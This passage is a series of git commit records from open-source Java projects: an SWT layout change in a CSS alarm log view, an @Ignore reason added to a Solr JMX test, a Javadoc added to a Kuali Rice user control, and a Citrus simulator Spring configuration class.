jmsMessage.setProperty(firstColumnName, Messages.LogViewArchive_NoMessageInDB); _jmsMessageList.addJMSMessage(jmsMessage); } } }); } }
Change Layout of the Head
applications/plugins/org.csstudio.alarm.table/src/org/csstudio/alarm/table/LogViewArchive.java
Change Layout of the Head
<ide><path>applications/plugins/org.csstudio.alarm.table/src/org/csstudio/alarm/table/LogViewArchive.java <ide> parent.setLayout(grid); <ide> Composite comp = new Composite(parent, SWT.NONE); <ide> comp.setLayoutData(new GridData(SWT.LEFT, SWT.FILL, true, false, 1, 1)); <del> comp.setLayout(new GridLayout(4, true)); <add> comp.setLayout(new GridLayout(4, false)); <ide> <ide> Group buttons = new Group(comp, SWT.LINE_SOLID); <ide> buttons.setText(Messages.getString("LogViewArchive_period")); //$NON-NLS-1$ <ide> <ide> Group from = new Group(comp, SWT.LINE_SOLID); <ide> from.setText(Messages.getString("LogViewArchive_from")); //$NON-NLS-1$ <del> from.setLayoutData(new GridData(SWT.FILL, SWT.FILL, true, true, 1, 1)); <add> gd = new GridData(SWT.LEFT, SWT.FILL, true, false, 1, 1); <add> gd.minimumHeight = 60; <add> gd.minimumWidth = 150; <add> from.setLayoutData(gd); <ide> from.setLayout(new GridLayout(1, true)); <ide> <ide> _timeFrom = new Text(from, SWT.SINGLE); <ide> _timeFrom.setText(" "); //$NON-NLS-1$ <ide> Group to = new Group(comp, SWT.LINE_SOLID); <ide> to.setText(Messages.getString("LogViewArchive_to")); //$NON-NLS-1$ <del> to.setLayoutData(new GridData(SWT.FILL, SWT.FILL, true, true, 1, 1)); <add> gd = new GridData(SWT.LEFT, SWT.FILL, true, false, 1, 1); <add> gd.minimumHeight = 60; <add> gd.minimumWidth = 150; <add> to.setLayoutData(gd); <ide> to.setLayout(new GridLayout(1, true)); <ide> <ide> _timeTo = new Text(to, SWT.SINGLE); <ide> count.setLayout(new GridLayout(1, true)); <ide> gd = new GridData(SWT.FILL, SWT.FILL, true, false, 1, 1); <ide> gd.minimumHeight = 60; <del> gd.minimumWidth = 300; <add> gd.minimumWidth = 75; <ide> count.setLayoutData(gd); <ide> <ide> _countLabel = new Label(count,SWT.RIGHT);
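The diff above reworks the SWT layout of the view header: the outer GridLayout switches from equal-width to natural-width columns, and the "from"/"to" groups get explicit GridData minimum sizes instead of grabbing excess vertical space. The following standalone sketch is not part of the CSS plugin; it is a minimal, hypothetical SWT snippet (class name, group label and sizes are invented, and it assumes SWT is on the classpath) that illustrates the same GridLayout/GridData pattern.

import org.eclipse.swt.SWT;
import org.eclipse.swt.layout.GridData;
import org.eclipse.swt.layout.GridLayout;
import org.eclipse.swt.widgets.Display;
import org.eclipse.swt.widgets.Group;
import org.eclipse.swt.widgets.Shell;
import org.eclipse.swt.widgets.Text;

/** Minimal sketch of the GridLayout/GridData idiom used in the diff (hypothetical names). */
public class HeaderLayoutSketch {
    public static void main(String[] args) {
        Display display = new Display();
        Shell shell = new Shell(display);
        // Four columns whose widths are NOT forced to be equal (makeColumnsEqualWidth = false),
        // matching the change from "new GridLayout(4, true)" to "new GridLayout(4, false)".
        shell.setLayout(new GridLayout(4, false));

        Group from = new Group(shell, SWT.NONE);
        from.setText("from");
        // Explicit minimum size instead of grabbing excess vertical space,
        // in the spirit of the added gd.minimumHeight / gd.minimumWidth lines.
        GridData gd = new GridData(SWT.LEFT, SWT.FILL, true, false, 1, 1);
        gd.minimumHeight = 60;
        gd.minimumWidth = 150;
        from.setLayoutData(gd);
        from.setLayout(new GridLayout(1, true));
        new Text(from, SWT.SINGLE).setText(" ");

        shell.pack();
        shell.open();
        while (!shell.isDisposed()) {
            if (!display.readAndDispatch()) {
                display.sleep();
            }
        }
        display.dispose();
    }
}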
Java
apache-2.0
d63aa91ef7c04c4f1b35ed21281467d17cd95dc8
0
cscorley/solr-only-mirror,cscorley/solr-only-mirror,cscorley/solr-only-mirror
/** * Licensed to the Apache Software Foundation (ASF) under one or more * contributor license agreements. See the NOTICE file distributed with * this work for additional information regarding copyright ownership. * The ASF licenses this file to You under the Apache License, Version 2.0 * (the "License"); you may not use this file except in compliance with * the License. You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package org.apache.solr.core; import org.apache.solr.core.JmxMonitoredMap.SolrDynamicMBean; import org.apache.solr.util.AbstractSolrTestCase; import org.junit.After; import org.junit.Before; import org.junit.Ignore; import org.junit.Test; import javax.management.*; import java.lang.management.ManagementFactory; import java.util.*; /** * Test for JMX Integration * * * @since solr 1.3 */ public class TestJmxIntegration extends AbstractSolrTestCase { @Override public String getSchemaFile() { return "schema.xml"; } @Override public String getSolrConfigFile() { return "solrconfig.xml"; } @Override @Before public void setUp() throws Exception { // Make sure that at least one MBeanServer is available MBeanServer mbeanServer = ManagementFactory.getPlatformMBeanServer(); super.setUp(); } @Override @After public void tearDown() throws Exception { super.tearDown(); } @Test public void testJmxRegistration() throws Exception { List<MBeanServer> servers = MBeanServerFactory.findMBeanServer(null); log.info("Servers in testJmxRegistration: " + servers); assertNotNull("MBeanServers were null", servers); assertFalse("No MBeanServer was found", servers.isEmpty()); MBeanServer mbeanServer = servers.get(0); assertTrue("No MBeans found in server", mbeanServer.getMBeanCount() > 0); Set<ObjectInstance> objects = mbeanServer.queryMBeans(null, null); assertFalse("No SolrInfoMBean objects found in mbean server", objects .isEmpty()); for (ObjectInstance o : objects) { MBeanInfo mbeanInfo = mbeanServer.getMBeanInfo(o.getObjectName()); if (mbeanInfo.getClassName().endsWith(SolrDynamicMBean.class.getName())) { assertTrue("No Attributes found for mbean: " + mbeanInfo, mbeanInfo .getAttributes().length > 0); } } } @Test public void testJmxUpdate() throws Exception { List<MBeanServer> servers = MBeanServerFactory.findMBeanServer(null); log.info("Servers in testJmxUpdate: " + servers); log.info(h.getCore().getInfoRegistry().toString()); SolrInfoMBean bean = null; // wait until searcher is registered for (int i=0; i<100; i++) { bean = h.getCore().getInfoRegistry().get("searcher"); if (bean != null) break; Thread.sleep(250); } if (bean==null) throw new RuntimeException("searcher was never registered"); ObjectName searcher = getObjectName("searcher", bean); MBeanServer mbeanServer = servers.get(0); log.info("Mbeans in server: " + mbeanServer.queryNames(null, null)); assertFalse("No mbean found for SolrIndexSearcher", mbeanServer.queryMBeans(searcher, null).isEmpty()); int oldNumDocs = Integer.valueOf((String) mbeanServer.getAttribute(searcher, "numDocs")); assertU(adoc("id", "1")); assertU("commit", commit()); int numDocs = Integer.valueOf((String) mbeanServer.getAttribute(searcher, "numDocs")); assertTrue("New numDocs is same as old numDocs as reported by 
JMX", numDocs > oldNumDocs); } @Test @Ignore("timing problem? https://issues.apache.org/jira/browse/SOLR-2715") public void testJmxOnCoreReload() throws Exception { List<MBeanServer> servers = MBeanServerFactory.findMBeanServer(null); MBeanServer mbeanServer = servers.get(0); String coreName = h.getCore().getName(); if (coreName.length() == 0) { coreName = h.getCoreContainer().getDefaultCoreName().length() > 0 ? h.getCoreContainer().getDefaultCoreName() : ""; } Set<ObjectInstance> oldBeans = mbeanServer.queryMBeans(null, null); int oldNumberOfObjects = 0; for (ObjectInstance bean : oldBeans) { try { if (String.valueOf(h.getCore().hashCode()).equals(mbeanServer.getAttribute(bean.getObjectName(), "coreHashCode"))) { oldNumberOfObjects++; } } catch (AttributeNotFoundException e) { // expected } } log.info("Before Reload: Size of infoRegistry: " + h.getCore().getInfoRegistry().size() + " MBeans: " + oldNumberOfObjects); assertEquals("Number of registered MBeans is not the same as info registry size", h.getCore().getInfoRegistry().size(), oldNumberOfObjects); h.getCoreContainer().reload(coreName); Set<ObjectInstance> newBeans = mbeanServer.queryMBeans(null, null); int newNumberOfObjects = 0; int registrySize = 0; SolrCore core = h.getCoreContainer().getCore(coreName); try { registrySize = core.getInfoRegistry().size(); for (ObjectInstance bean : newBeans) { try { if (String.valueOf(core.hashCode()).equals(mbeanServer.getAttribute(bean.getObjectName(), "coreHashCode"))) { newNumberOfObjects++; } } catch (AttributeNotFoundException e) { // expected } } } finally { core.close(); } log.info("After Reload: Size of infoRegistry: " + registrySize + " MBeans: " + newNumberOfObjects); assertEquals("Number of registered MBeans is not the same as info registry size", registrySize, newNumberOfObjects); } private ObjectName getObjectName(String key, SolrInfoMBean infoBean) throws MalformedObjectNameException { Hashtable<String, String> map = new Hashtable<String, String>(); map.put("type", key); map.put("id", infoBean.getName()); String coreName = h.getCore().getName(); return ObjectName.getInstance(("solr" + (null != coreName ? "/" + coreName : "")), map); } }
core/src/test/org/apache/solr/core/TestJmxIntegration.java
/** * Licensed to the Apache Software Foundation (ASF) under one or more * contributor license agreements. See the NOTICE file distributed with * this work for additional information regarding copyright ownership. * The ASF licenses this file to You under the Apache License, Version 2.0 * (the "License"); you may not use this file except in compliance with * the License. You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package org.apache.solr.core; import org.apache.solr.core.JmxMonitoredMap.SolrDynamicMBean; import org.apache.solr.util.AbstractSolrTestCase; import org.junit.After; import org.junit.Before; import org.junit.Ignore; import org.junit.Test; import javax.management.*; import java.lang.management.ManagementFactory; import java.util.*; /** * Test for JMX Integration * * * @since solr 1.3 */ public class TestJmxIntegration extends AbstractSolrTestCase { @Override public String getSchemaFile() { return "schema.xml"; } @Override public String getSolrConfigFile() { return "solrconfig.xml"; } @Override @Before public void setUp() throws Exception { // Make sure that at least one MBeanServer is available MBeanServer mbeanServer = ManagementFactory.getPlatformMBeanServer(); super.setUp(); } @Override @After public void tearDown() throws Exception { super.tearDown(); } @Test public void testJmxRegistration() throws Exception { List<MBeanServer> servers = MBeanServerFactory.findMBeanServer(null); log.info("Servers in testJmxRegistration: " + servers); assertNotNull("MBeanServers were null", servers); assertFalse("No MBeanServer was found", servers.isEmpty()); MBeanServer mbeanServer = servers.get(0); assertTrue("No MBeans found in server", mbeanServer.getMBeanCount() > 0); Set<ObjectInstance> objects = mbeanServer.queryMBeans(null, null); assertFalse("No SolrInfoMBean objects found in mbean server", objects .isEmpty()); for (ObjectInstance o : objects) { MBeanInfo mbeanInfo = mbeanServer.getMBeanInfo(o.getObjectName()); if (mbeanInfo.getClassName().endsWith(SolrDynamicMBean.class.getName())) { assertTrue("No Attributes found for mbean: " + mbeanInfo, mbeanInfo .getAttributes().length > 0); } } } @Test public void testJmxUpdate() throws Exception { List<MBeanServer> servers = MBeanServerFactory.findMBeanServer(null); log.info("Servers in testJmxUpdate: " + servers); log.info(h.getCore().getInfoRegistry().toString()); SolrInfoMBean bean = null; // wait until searcher is registered for (int i=0; i<100; i++) { bean = h.getCore().getInfoRegistry().get("searcher"); if (bean != null) break; Thread.sleep(250); } if (bean==null) throw new RuntimeException("searcher was never registered"); ObjectName searcher = getObjectName("searcher", bean); MBeanServer mbeanServer = servers.get(0); log.info("Mbeans in server: " + mbeanServer.queryNames(null, null)); assertFalse("No mbean found for SolrIndexSearcher", mbeanServer.queryMBeans(searcher, null).isEmpty()); int oldNumDocs = Integer.valueOf((String) mbeanServer.getAttribute(searcher, "numDocs")); assertU(adoc("id", "1")); assertU("commit", commit()); int numDocs = Integer.valueOf((String) mbeanServer.getAttribute(searcher, "numDocs")); assertTrue("New numDocs is same as old numDocs as reported by 
JMX", numDocs > oldNumDocs); } @Test @Ignore("fix me") public void testJmxOnCoreReload() throws Exception { List<MBeanServer> servers = MBeanServerFactory.findMBeanServer(null); MBeanServer mbeanServer = servers.get(0); String coreName = h.getCore().getName(); if (coreName.length() == 0) { coreName = h.getCoreContainer().getDefaultCoreName().length() > 0 ? h.getCoreContainer().getDefaultCoreName() : ""; } Set<ObjectInstance> oldBeans = mbeanServer.queryMBeans(null, null); int oldNumberOfObjects = 0; for (ObjectInstance bean : oldBeans) { try { if (String.valueOf(h.getCore().hashCode()).equals(mbeanServer.getAttribute(bean.getObjectName(), "coreHashCode"))) { oldNumberOfObjects++; } } catch (AttributeNotFoundException e) { // expected } } log.info("Before Reload: Size of infoRegistry: " + h.getCore().getInfoRegistry().size() + " MBeans: " + oldNumberOfObjects); assertEquals("Number of registered MBeans is not the same as info registry size", h.getCore().getInfoRegistry().size(), oldNumberOfObjects); h.getCoreContainer().reload(coreName); Set<ObjectInstance> newBeans = mbeanServer.queryMBeans(null, null); int newNumberOfObjects = 0; int registrySize = 0; SolrCore core = h.getCoreContainer().getCore(coreName); try { registrySize = core.getInfoRegistry().size(); for (ObjectInstance bean : newBeans) { try { if (String.valueOf(core.hashCode()).equals(mbeanServer.getAttribute(bean.getObjectName(), "coreHashCode"))) { newNumberOfObjects++; } } catch (AttributeNotFoundException e) { // expected } } } finally { core.close(); } log.info("After Reload: Size of infoRegistry: " + registrySize + " MBeans: " + newNumberOfObjects); assertEquals("Number of registered MBeans is not the same as info registry size", registrySize, newNumberOfObjects); } private ObjectName getObjectName(String key, SolrInfoMBean infoBean) throws MalformedObjectNameException { Hashtable<String, String> map = new Hashtable<String, String>(); map.put("type", key); map.put("id", infoBean.getName()); String coreName = h.getCore().getName(); return ObjectName.getInstance(("solr" + (null != coreName ? "/" + coreName : "")), map); } }
SOLR-2715: add reason for @Ingore to @Ignore msg git-svn-id: 308d55f399f3bd9aa0560a10e81a003040006c48@1196156 13f79535-47bb-0310-9956-ffa450edef68
core/src/test/org/apache/solr/core/TestJmxIntegration.java
SOLR-2715: add reason for @Ingore to @Ignore msg
<ide><path>core/src/test/org/apache/solr/core/TestJmxIntegration.java <ide> numDocs > oldNumDocs); <ide> } <ide> <del> @Test @Ignore("fix me") <add> @Test @Ignore("timing problem? https://issues.apache.org/jira/browse/SOLR-2715") <ide> public void testJmxOnCoreReload() throws Exception { <ide> List<MBeanServer> servers = MBeanServerFactory.findMBeanServer(null); <ide> MBeanServer mbeanServer = servers.get(0);
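The only functional change in this record is the @Ignore annotation: the placeholder reason "fix me" is replaced with a pointer to the JIRA issue explaining why the test is disabled. Below is a minimal, self-contained JUnit 4 sketch of that idiom; the test class and issue URL are illustrative, not taken from Solr.

import static org.junit.Assert.assertTrue;

import org.junit.Ignore;
import org.junit.Test;

public class IgnoreReasonSketch {

    // JUnit 4 reports the reason string when the test is skipped, so a tracking
    // link is far more useful to the next reader than a bare "fix me".
    @Test
    @Ignore("timing-dependent; see https://issues.example.org/browse/ISSUE-123")
    public void flakyTest() {
        assertTrue(System.currentTimeMillis() > 0);
    }

    @Test
    public void stableTest() {
        assertTrue(1 + 1 == 2);
    }
}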
Java
apache-2.0
400e5b30fae9ecc017047cbe19510c5a00ebc80f
0
ewestfal/rice,smith750/rice,bsmith83/rice-1,shahess/rice,bhutchinson/rice,sonamuthu/rice-1,jwillia/kc-rice1,bsmith83/rice-1,geothomasp/kualico-rice-kc,gathreya/rice-kc,UniversityOfHawaiiORS/rice,rojlarge/rice-kc,gathreya/rice-kc,bhutchinson/rice,ewestfal/rice,smith750/rice,gathreya/rice-kc,kuali/kc-rice,sonamuthu/rice-1,cniesen/rice,cniesen/rice,geothomasp/kualico-rice-kc,gathreya/rice-kc,rojlarge/rice-kc,bsmith83/rice-1,ewestfal/rice-svn2git-test,UniversityOfHawaiiORS/rice,rojlarge/rice-kc,smith750/rice,ewestfal/rice,shahess/rice,kuali/kc-rice,rojlarge/rice-kc,ewestfal/rice-svn2git-test,ewestfal/rice-svn2git-test,ewestfal/rice-svn2git-test,bhutchinson/rice,shahess/rice,jwillia/kc-rice1,ewestfal/rice,bhutchinson/rice,UniversityOfHawaiiORS/rice,bsmith83/rice-1,cniesen/rice,smith750/rice,sonamuthu/rice-1,ewestfal/rice,rojlarge/rice-kc,jwillia/kc-rice1,sonamuthu/rice-1,geothomasp/kualico-rice-kc,jwillia/kc-rice1,geothomasp/kualico-rice-kc,UniversityOfHawaiiORS/rice,shahess/rice,cniesen/rice,kuali/kc-rice,gathreya/rice-kc,shahess/rice,smith750/rice,geothomasp/kualico-rice-kc,bhutchinson/rice,jwillia/kc-rice1,kuali/kc-rice,cniesen/rice,UniversityOfHawaiiORS/rice,kuali/kc-rice
/** * Copyright 2005-2012 The Kuali Foundation * * Licensed under the Educational Community License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.opensource.org/licenses/ecl2.php * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package org.kuali.rice.krad.uif.control; import org.apache.commons.lang.StringUtils; import org.kuali.rice.kim.api.identity.Person; import org.kuali.rice.kim.api.identity.PersonService; import org.kuali.rice.kim.api.services.KimApiServiceLocator; import org.kuali.rice.krad.uif.field.InputField; import org.kuali.rice.krad.uif.util.ScriptUtils; import org.kuali.rice.krad.uif.view.View; import org.kuali.rice.krad.uif.component.Component; import org.kuali.rice.krad.uif.component.MethodInvokerConfig; import org.kuali.rice.krad.uif.field.AttributeQuery; import org.kuali.rice.krad.uif.widget.QuickFinder; /** * Represents a user control, which is a special control to handle * the input of a Person * * @author Kuali Rice Team ([email protected]) */ public class UserControl extends TextControl { private static final long serialVersionUID = 7468340793076585869L; private String principalIdPropertyName; private String personNamePropertyName; private String personObjectPropertyName; public UserControl() { super(); } /** * @see org.kuali.rice.krad.uif.component.ComponentBase#performApplyModel(org.kuali.rice.krad.uif.view.View, * java.lang.Object, org.kuali.rice.krad.uif.component.Component) */ @Override public void performApplyModel(View view, Object model, Component parent) { super.performApplyModel(view, model, parent); if (!(parent instanceof InputField)) { return; } InputField field = (InputField) parent; field.getAdditionalHiddenPropertyNames().add(principalIdPropertyName); if (!field.isReadOnly()) { // add information fields if (StringUtils.isNotBlank(personNamePropertyName)) { field.getPropertyNamesForAdditionalDisplay().add(personNamePropertyName); } else { field.getPropertyNamesForAdditionalDisplay().add(personObjectPropertyName + ".name"); } // setup script to clear id field when name is modified String idPropertyPath = field.getBindingInfo().getPropertyAdjustedBindingPath(principalIdPropertyName); String onChangeScript = "setValue('" + ScriptUtils.escapeName(idPropertyPath) + "','');"; if (StringUtils.isNotBlank(getOnChangeScript())) { onChangeScript = getOnChangeScript() + onChangeScript; } setOnChangeScript(onChangeScript); } if (field.isReadOnly() && StringUtils.isBlank(field.getReadOnlyDisplaySuffixPropertyName())) { if (StringUtils.isNotBlank(personNamePropertyName)) { field.setReadOnlyDisplaySuffixPropertyName(personNamePropertyName); } else { field.setReadOnlyDisplaySuffixPropertyName(personObjectPropertyName + ".name"); } } // setup field query for displaying name AttributeQuery attributeQuery = new AttributeQuery(); MethodInvokerConfig methodInvokerConfig = new MethodInvokerConfig(); PersonService personService = KimApiServiceLocator.getPersonService(); methodInvokerConfig.setTargetObject(personService); attributeQuery.setQueryMethodInvokerConfig(methodInvokerConfig); attributeQuery.setQueryMethodToCall("getPersonByPrincipalName"); 
attributeQuery.getQueryMethodArgumentFieldList().add(field.getPropertyName()); attributeQuery.getReturnFieldMapping().put("principalId", principalIdPropertyName); if (StringUtils.isNotBlank(personNamePropertyName)) { attributeQuery.getReturnFieldMapping().put("name", personNamePropertyName); } else { attributeQuery.getReturnFieldMapping().put("name", personObjectPropertyName + ".name"); } field.setAttributeQuery(attributeQuery); // setup field lookup QuickFinder quickFinder = field.getQuickfinder(); if (quickFinder.isRender()) { if (StringUtils.isBlank(quickFinder.getDataObjectClassName())) { quickFinder.setDataObjectClassName(Person.class.getName()); } if (quickFinder.getFieldConversions().isEmpty()) { quickFinder.getFieldConversions().put("principalId", principalIdPropertyName); if (StringUtils.isNotBlank(personNamePropertyName)) { quickFinder.getFieldConversions().put("name", personNamePropertyName); } else { quickFinder.getFieldConversions().put("name", personObjectPropertyName + ".name"); } quickFinder.getFieldConversions().put("principalName", field.getPropertyName()); } } } /** * The name of the property on the parent object that holds the principal id * * @return String principalIdPropertyName */ public String getPrincipalIdPropertyName() { return principalIdPropertyName; } /** * Setter for the name of the property on the parent object that holds the principal id * * @param principalIdPropertyName */ public void setPrincipalIdPropertyName(String principalIdPropertyName) { this.principalIdPropertyName = principalIdPropertyName; } /** * The name of the property on the parent object that holds the person name * * @return String personNamePropertyName */ public String getPersonNamePropertyName() { return personNamePropertyName; } /** * Setter for the name of the property on the parent object that holds the person name * * @param personNamePropertyName */ public void setPersonNamePropertyName(String personNamePropertyName) { this.personNamePropertyName = personNamePropertyName; } /** * The name of the property on the parent object that holds the person object * * @return String personObjectPropertyName */ public String getPersonObjectPropertyName() { return personObjectPropertyName; } /** * Setter for the name of the property on the parent object that holds the person object * * @param personObjectPropertyName */ public void setPersonObjectPropertyName(String personObjectPropertyName) { this.personObjectPropertyName = personObjectPropertyName; } }
krad/krad-web-framework/src/main/java/org/kuali/rice/krad/uif/control/UserControl.java
/** * Copyright 2005-2012 The Kuali Foundation * * Licensed under the Educational Community License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.opensource.org/licenses/ecl2.php * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package org.kuali.rice.krad.uif.control; import org.apache.commons.lang.StringUtils; import org.kuali.rice.kim.api.identity.Person; import org.kuali.rice.kim.api.identity.PersonService; import org.kuali.rice.kim.api.services.KimApiServiceLocator; import org.kuali.rice.krad.uif.field.InputField; import org.kuali.rice.krad.uif.util.ScriptUtils; import org.kuali.rice.krad.uif.view.View; import org.kuali.rice.krad.uif.component.Component; import org.kuali.rice.krad.uif.component.MethodInvokerConfig; import org.kuali.rice.krad.uif.field.AttributeQuery; import org.kuali.rice.krad.uif.widget.QuickFinder; /** * Represents a user control, which is a special control to handle * the input of a Person * * @author Kuali Rice Team ([email protected]) */ public class UserControl extends TextControl { private static final long serialVersionUID = 7468340793076585869L; private String principalIdPropertyName; private String personNamePropertyName; private String personObjectPropertyName; public UserControl() { super(); } @Override public void performApplyModel(View view, Object model, Component parent) { super.performApplyModel(view, model, parent); if (!(parent instanceof InputField)) { return; } InputField field = (InputField) parent; field.getAdditionalHiddenPropertyNames().add(principalIdPropertyName); if (!field.isReadOnly()) { // add information fields if (StringUtils.isNotBlank(personNamePropertyName)) { field.getPropertyNamesForAdditionalDisplay().add(personNamePropertyName); } else { field.getPropertyNamesForAdditionalDisplay().add(personObjectPropertyName + ".name"); } // setup script to clear id field when name is modified String idPropertyPath = field.getBindingInfo().getPropertyAdjustedBindingPath(principalIdPropertyName); String onChangeScript = "setValue('" + ScriptUtils.escapeName(idPropertyPath) + "','');"; if (StringUtils.isNotBlank(getOnChangeScript())) { onChangeScript = getOnChangeScript() + onChangeScript; } setOnChangeScript(onChangeScript); } if (field.isReadOnly() && StringUtils.isBlank(field.getReadOnlyDisplaySuffixPropertyName())) { if (StringUtils.isNotBlank(personNamePropertyName)) { field.setReadOnlyDisplaySuffixPropertyName(personNamePropertyName); } else { field.setReadOnlyDisplaySuffixPropertyName(personObjectPropertyName + ".name"); } } // setup field query for displaying name AttributeQuery attributeQuery = new AttributeQuery(); MethodInvokerConfig methodInvokerConfig = new MethodInvokerConfig(); PersonService personService = KimApiServiceLocator.getPersonService(); methodInvokerConfig.setTargetObject(personService); attributeQuery.setQueryMethodInvokerConfig(methodInvokerConfig); attributeQuery.setQueryMethodToCall("getPersonByPrincipalName"); attributeQuery.getQueryMethodArgumentFieldList().add(field.getPropertyName()); attributeQuery.getReturnFieldMapping().put("principalId", principalIdPropertyName); if (StringUtils.isNotBlank(personNamePropertyName)) { 
attributeQuery.getReturnFieldMapping().put("name", personNamePropertyName); } else { attributeQuery.getReturnFieldMapping().put("name", personObjectPropertyName + ".name"); } field.setAttributeQuery(attributeQuery); // setup field lookup QuickFinder quickFinder = field.getQuickfinder(); if (quickFinder.isRender()) { if (StringUtils.isBlank(quickFinder.getDataObjectClassName())) { quickFinder.setDataObjectClassName(Person.class.getName()); } if (quickFinder.getFieldConversions().isEmpty()) { quickFinder.getFieldConversions().put("principalId", principalIdPropertyName); if (StringUtils.isNotBlank(personNamePropertyName)) { quickFinder.getFieldConversions().put("name", personNamePropertyName); } else { quickFinder.getFieldConversions().put("name", personObjectPropertyName + ".name"); } quickFinder.getFieldConversions().put("principalName", field.getPropertyName()); } } } /** * The name of the property on the parent object that holds the principal id * * @return String principalIdPropertyName */ public String getPrincipalIdPropertyName() { return principalIdPropertyName; } /** * Setter for the name of the property on the parent object that holds the principal id * * @param principalIdPropertyName */ public void setPrincipalIdPropertyName(String principalIdPropertyName) { this.principalIdPropertyName = principalIdPropertyName; } /** * The name of the property on the parent object that holds the person name * * @return String personNamePropertyName */ public String getPersonNamePropertyName() { return personNamePropertyName; } /** * Setter for the name of the property on the parent object that holds the person name * * @param personNamePropertyName */ public void setPersonNamePropertyName(String personNamePropertyName) { this.personNamePropertyName = personNamePropertyName; } /** * The name of the property on the parent object that holds the person object * * @return String personObjectPropertyName */ public String getPersonObjectPropertyName() { return personObjectPropertyName; } /** * Setter for the name of the property on the parent object that holds the person object * * @param personObjectPropertyName */ public void setPersonObjectPropertyName(String personObjectPropertyName) { this.personObjectPropertyName = personObjectPropertyName; } }
KULRICE-6641 - Adding javadocs.
krad/krad-web-framework/src/main/java/org/kuali/rice/krad/uif/control/UserControl.java
KULRICE-6641 - Adding javadocs.
<ide><path>krad/krad-web-framework/src/main/java/org/kuali/rice/krad/uif/control/UserControl.java <ide> super(); <ide> } <ide> <add> /** <add> * @see org.kuali.rice.krad.uif.component.ComponentBase#performApplyModel(org.kuali.rice.krad.uif.view.View, <add> * java.lang.Object, org.kuali.rice.krad.uif.component.Component) <add> */ <ide> @Override <ide> public void performApplyModel(View view, Object model, Component parent) { <ide> super.performApplyModel(view, model, parent);
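This commit only adds a Javadoc block to the overridden performApplyModel method, pointing back to the superclass contract with @see rather than duplicating its description. A generic sketch of that documentation style for an overridden method follows; the classes below are invented for illustration, whereas Rice itself points at ComponentBase#performApplyModel.

/** Hypothetical base class standing in for the framework superclass. */
class BaseComponent {
    /**
     * Hook invoked while the model is applied to the component tree.
     *
     * @param model the form or model object backing the view
     */
    public void performApplyModel(Object model) {
        // base behavior omitted in this sketch
    }
}

/** Hypothetical subclass documenting its override by pointing at the base contract. */
class UserLikeControl extends BaseComponent {

    /**
     * @see BaseComponent#performApplyModel(java.lang.Object)
     */
    @Override
    public void performApplyModel(Object model) {
        super.performApplyModel(model);
        // subclass-specific adjustments would go here
    }
}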
Java
apache-2.0
66bc08aec02148fd3998912e3c234236982cdac0
0
christophd/citrus-simulator,christophd/citrus-simulator,christophd/citrus-simulator,christophd/citrus-simulator
/* * Copyright 2006-2017 the original author or authors. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package com.consol.citrus.simulator.annotation; import com.consol.citrus.config.CitrusSpringConfig; import com.consol.citrus.simulator.bean.ScenarioBeanNameGenerator; import com.consol.citrus.simulator.config.SimulatorConfigurationProperties; import com.consol.citrus.simulator.config.SimulatorImportSelector; import org.slf4j.Logger; import org.slf4j.LoggerFactory; import org.springframework.boot.context.properties.EnableConfigurationProperties; import org.springframework.context.annotation.*; import org.springframework.core.io.ClassPathResource; import java.io.IOException; import java.io.InputStream; import java.util.Properties; /** * @author Christoph Deppisch */ @Configuration @ComponentScan(basePackages = { "com.consol.citrus.simulator.config", "com.consol.citrus.simulator.controller", "com.consol.citrus.simulator.endpoint", "com.consol.citrus.simulator.listener", "com.consol.citrus.simulator.service", }, nameGenerator = ScenarioBeanNameGenerator.class) @Import(value = {CitrusSpringConfig.class, SimulatorImportSelector.class}) @ImportResource( locations = { "classpath*:citrus-simulator-context.xml", "classpath*:META-INF/citrus-simulator-context.xml" }) @PropertySource( value = { "citrus-simulator.properties", "META-INF/citrus-simulator.properties" }, ignoreResourceNotFound = true) @EnableConfigurationProperties(SimulatorConfigurationProperties.class) public class SimulatorSupport { /** Logger */ private static Logger log = LoggerFactory.getLogger(SimulatorSupport.class); /** Application version */ private static String version; /* Load application version */ static { try (final InputStream in = new ClassPathResource("META-INF/app.version").getInputStream()) { Properties versionProperties = new Properties(); versionProperties.load(in); version = versionProperties.get("app.version").toString(); } catch (IOException e) { log.warn("Unable to read application version information", e); version = ""; } } }
simulator-core/src/main/java/com/consol/citrus/simulator/annotation/SimulatorSupport.java
/* * Copyright 2006-2017 the original author or authors. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package com.consol.citrus.simulator.annotation; import com.consol.citrus.config.CitrusSpringConfig; import com.consol.citrus.simulator.bean.ScenarioBeanNameGenerator; import com.consol.citrus.simulator.config.SimulatorConfigurationProperties; import com.consol.citrus.simulator.config.SimulatorImportSelector; import org.slf4j.Logger; import org.slf4j.LoggerFactory; import org.springframework.boot.context.properties.EnableConfigurationProperties; import org.springframework.context.annotation.*; import 